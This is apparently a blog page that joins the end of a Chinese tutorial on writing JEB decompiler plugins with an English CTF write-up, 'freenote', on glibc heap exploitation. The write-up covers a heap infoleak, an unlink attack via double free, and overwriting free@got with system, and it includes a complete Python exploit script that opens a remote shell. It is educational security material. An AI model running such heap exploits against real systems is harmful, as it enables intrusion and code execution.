JEB原生支持Java和Python两种语言进行开发,后者的支持是通过Jython实现的.这里简便起见我们的例子均以Python为例.个人建议想使用前者的话最好使用Scala,否则Java本身实在太罗嗦了.

Java

在eclipse中配置好classpath中的library指向bin/jeb.jar,同时将javadoc路径指向jeb/doc/apidoc.zip即可.

1434639993696

1434639954618

1434639823928

1434639770823

Python

Python环境配置相对麻烦点,因为JEB并没有提供相对应的skeleton,导致Python的IDE中默认没有代码补全,需要自行配置.笔者使用了PyCharm的JythonHelper插件,可以帮助生成skeleton从而有基本的代码补全.

配置好环境后,我们来编写一个最简单的插件:输出光标所在位置的method signature,代码如下所示:

from jeb.api import IScript
from jeb.api.ui import View
class test(IScript):

    def run(self, j):
        self.instance = j
        sig = self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature()
        currentMethod = self.instance.getDecompiledMethodTree(sig)
        self.instance.print("scanning method: " + currentMethod.getSignature())

保存为test.py,点击File->Run Script->test.py, JEB就会在下面的console中输出当前光标所在函数的signature.

总结

本文介绍了JEB Java AST API的基本知识和插件编写入门,同时也可以作为一个APIDoc的补充参考.在下一篇文章中我们将会根据实例讲解如何编写高级的更复杂的插件. 源代码和测试样例在https://github.com/flankerhqd/jebPlugins可以找到。

freenote – advanced heap exploitation

Author: Flanker

Abstract

Freenote is a binary with infoleak and double free vulnerabilities and is a good practice for heap exploitation. The first vulnerability is when a note is deleted, its content isn’t zeroed and when another note is allocated at the very same location, the content of last allocation is still there. The second vulnerability is when freeing note the program does not check if the current note is actually already freed, causing a double free.

Introduction

There are two data structures used in freenote, one we name it “NoteBook” and the other “Note”. Note book can be mapped to the following structure:

struct Notebook {
    int tot_cnt;
    int use_cnt;
    Note notes[256];
}

struct Note {
    int in_use;
    int content_length;
    char* content;
}

There are four operations available: list, delete, new, edit. Delete operation simply set the in_use field to zero and call free on the Note ptr, however it doesn’t check whether this note is already freed before (in_use field is already zero). Edit option checks if the new input lenght is equal to original one. If not, it will call realloc and then write new content into the origin note. New option mallocs a (len//0x80 + 1)*0x80 chunk and writes user input, notice no zmalloc or memeset zero is called. Thus lead to the first vulnerability – infoleak.

Heap baseaddress InfoLeak

As we stated before, neither new note or delete note operations zero outs memory. Recall the chunk struct of glibc malloc:

struct malloc_chunk { 
    INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ 
    INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ 
    struct malloc_chunk* fd; /* double links -- used only if free. */ 
    struct malloc_chunk* bk; /* double links -- used only if free. */ 
    struct malloc_chunk* fd_nextsize; /* Only used for large blocks: pointer to next larger size. */
    struct malloc_chunk* bk_nextsize; /* Only used for large blocks: pointer to next larger size. */
 };

And also, list note use %s format string to output note content, so we can free two non-adjacent note. This will make the first 16 bytes (for 64bit-arch or 8bytes for 32bit-arch) after size field, which is originally the “data”/”content” of in use note. Then we can new a note again, because freed chunk in bin list tend to be reused first, we will actually get the originally freed note. And write sizeof(malloc_chunk*) char into the note, call list note and we will get the bk pointer value.

We cannot just free one note and call new note on it because when there is only one free chunk, this chunk’s fd and bk will point to glibc global struct but not chunk on the heap. We need the heap address to bypass ASLR to exploit the next double-free vulnerability.

So steps are: – New four notes, 0,1,2,3 – Delete 0,2 – New note again, this time note 0’s chunk is reused, write 4bytes(32bit arch)/8bytes(64bit arch) – List note, get note2’s address, substract offset to get base heap address.

After 0 is freed:

gdb-peda$ x/100xg 0x604820
0x604820:    0x0000000000000000    0x0000000000000091
0x604830:    0x00007ffff7dd37b8    0x00007ffff7dd37b8

gdb-peda$ p main_arena
$3 = {
  mutex = 0x0,
  flags = 0x1,
  fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
  top = 0x604a60,
  last_remainder = 0x0,
  bins = {0x604820, 0x604820, 0x7ffff7dd37c8, 0x7ffff7dd37c8, 0x7ffff7dd37d8, 0x7ffff7dd37d8,

Notice currently chunk Note0 does not contain pointer to address on heap.

After 2 is freed:

(after free 2)
0x604820:    0x0000000000000000    0x0000000000000091(note 0 chunk)
0x604830:    0x00007ffff7dd37b8    0x0000000000604940(point to note2 free chunk)
0x604840:    0x0000000000000000    0x0000000000000000
0x604850:    0x0000000000000000    0x0000000000000000
0x604860:    0x0000000000000000    0x0000000000000000
0x604870:    0x0000000000000000    0x0000000000000000
0x604880:    0x0000000000000000    0x0000000000000000
0x604890:    0x0000000000000000    0x0000000000000000
0x6048a0:    0x0000000000000000    0x0000000000000000
0x6048b0:    0x0000000000000090    0x0000000000000090(note 1 chunk)
0x6048c0:    0x0000000062626262    0x0000000000000000
0x6048d0:    0x0000000000000000    0x0000000000000000
0x6048e0:    0x0000000000000000    0x0000000000000000
0x6048f0:    0x0000000000000000    0x0000000000000000
0x604900:    0x0000000000000000    0x0000000000000000
0x604910:    0x0000000000000000    0x0000000000000000
0x604920:    0x0000000000000000    0x0000000000000000
0x604930:    0x0000000000000000    0x0000000000000000
0x604940:    0x0000000000000000    0x0000000000000091(note 2 chunk)
0x604950:    0x0000000000604820    0x00007ffff7dd37b8(point back to note0 free chunk)
0x604960:    0x0000000000000000    0x0000000000000000

gdb-peda$ p main_arena
$4 = {
mutex = 0x0,
flags = 0x1,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x604a60,
last_remainder = 0x0,
bins = {0x604940, 0x604820, 0x7ffff7dd37c8, 0x7ffff7dd37c8, 0x7ffff7dd37d8, 0x7ffff7dd37d8,

Double free

As note can be freed twice, we can use the unlink primitive to do a arbitrary write. But how do we bypass the glibc unlink FD->BK == P && BK->FD == P check? We will use 64bit arch in the following content of this article.

Remember there is also a pointer point to the note chunk in notes array, we call it “content”. A fake chunk with *(FD+3) == P == content and *(BK+2) == P == content will pass glibc’s check, thus make *P = P-3.

Free use prev_size to decide previous chunk’s address if prev_inuse (size&1) is false. If dlmalloc finds out previous chunk is free when freeing current chunk, it will do an unlink on previous chunk to remove it off freelist and merge with current chunk.

So we have a sckeleton idea, – Alloc 0,1,2, place fake chunk at 0 – Free 1,2 – Alloc 3 covering 1,2, so that we can construct a fake chunk in the original location of 2 – Call free on 2 again

What’s worthing noticing is that dlmalloc decides if current block is in use by checking next adjacent chunk’s in_use flag. So to make double free on 2 succeed, we need append two more fake chunks, and set them as in use. This is because:

For the following chunks (assume all valid chunks): | 1 | 2 | 3 | 4 | 5 |

When freeing 3, dlmalloc will check if 2 is in use using 3’s PREV_INUSE flag, and check if 4 is in use using 5’s PREV_INUSE flag. 5’s address is decided using 3’size + 3’address + 4’size. So when we make fake chunk 3, we must also append two “valid” fake inuse chunks after 3, to avoid SIGSEGV.

READ LIBC ADDRESS

As we successfully perform a write, the memory layout of NoteBook struct, which is at the beginning of heap, becomes

gdb-peda$ x/40xg 0x11af000
0x11af000:    0x0000000000000000    0x0000000000001821
0x11af010:    0x0000000000000100    0x0000000000000002
0x11af020:    0x0000000000000001    0x0000000000000020
0x11af030:    0x00000000011af018    0x0000000000000001

Notice *P has becomes P-3, so by editing note we can overwrite P, pointing it to free@got or whatever convenient. When constructing note payload, notice the payload length should be equal to original one (0x20), or realloc will be called and our fake chunk will not pass realloc check. For the following note edit’s convenience (we’re writing a 8byte address to note 0, we can modify note0’s length as 8 here).

Then perform a note list to read free@got’s content, i.e. free’s address. Using this address we’re able to get system’s address. Then a write (note edit) is performed on note 0, remember we’ve already modified note0’s length to 8, thus avoiding realloc.

EXECUTE CODE

We choose to rewrite free@got because we can control its argument, e.g. freeing a note whose content is under our control like “/bin/sh”. So we can new a note with content “/bin/sh\x00”, then call rewrited free (now system) will give us a shell.

Example code (64bit and 32bit)

64bit:

from zio import *
import time
#io = zio('./freenote1')
io = zio(("xxxx",10001))

def new_note(content):
    io.read_until("choice: ")
    io.writeline("2")

    io.read_until("new note: ")
    io.writeline(str(len(content)))
    io.read_until("note: ")
    io.writeline(content)
    io.read_until("choice: ")

def free_note(nid):
    io.read_until("choice: ")
    io.writeline("4")
    io.read_until("number: ")
    io.writeline(str(nid))

def read_note(nid):
    io.read_until("Your choice: ")
    io.writeline("1")
    notes = io.read_until("== 0ops Free Note ==")
        if notes.find("Invalid") != -1:
            io.read_until("Your choice: ")
            notes = io.read_until("== 0ops Free Note ==")
    for note in notes.split('\n'):
        if note[0] == str(nid):
            return note.split("%d. "%nid)[1]
    return ""
def mod_note(nid, content):
        io.read_until("Your choice: ")
        io.writeline("3")
        io.read_until("Note number: ")
        io.writeline(str(nid))
        io.read_until("Length of note: ")
        io.writeline(str(len(content)))
    io.read_until("Enter your note: ")
        io.writeline(content)
        io.read_until("choice: ")


new_note("aaaa")
new_note("bbbb")
new_note("cccc")
new_note("dddd")

free_note(0)
free_note(2)
new_note("abcdabcd")
#free block 0 and 2
out = read_note(0)
base_addr = l64(out[8:].ljust(8,"\x00")) - 144*2 - (0x604820 - 0x603000)

prev_size_offset = 144*2 + 128
#note addr begins at 0x603010 
FAKE_PREV_SIZE = 0x0
FAKE_SIZE = prev_size_offset + 1
FAKE_FD_ADDR = base_addr + 0x18 #*(FD+4) = P
FAKE_BK_ADDR = base_addr + 0x20 #*(BK+3) = P

#free all notes, 0,1,2,3
free_note(0)
free_note(1)
free_note(3)

new_note(l64(FAKE_PREV_SIZE) + l64(FAKE_SIZE) + l64(FAKE_FD_ADDR) + l64(FAKE_BK_ADDR))
new_note("/bin/sh\x00")

FAKE_PREV_SIZE = prev_size_offset
FAKE_SIZE = 0x90


#alloc chunk at (2,3)
new_note('a'*128 + l64(FAKE_PREV_SIZE) + l64(FAKE_SIZE) + 128*'a' + (l64(0) + l64(0x91) + 128*'a')*2)
free_note(3)
#alloc note0 with fake chunk
#now free block 1, then alloc block4 at block(1,2)
#fake chunk 2 should have prev_size points to chunk 0 data area

'''
|PREV_SIZE|SIZE|{PREV_SIZE}|{SIZE}|{DATA}|PREV_SIZE|SIZE|DATA
'''

'''
now *p = p-3, modify note 1 to free@got
'''
mod_note(0, l64(0x2) + l64(0x1) + l64(0x8) + l64(0x602018))

free_addr = l64(read_note(0).ljust(8, "\x00"))
system_addr = free_addr - (0x76C60 - 0x40190)#libc at pwn server
#system_addr = free_addr - (0x82df0 - 0x46640)
mod_note(0, l64(system_addr))
free_note(1)
io.interact()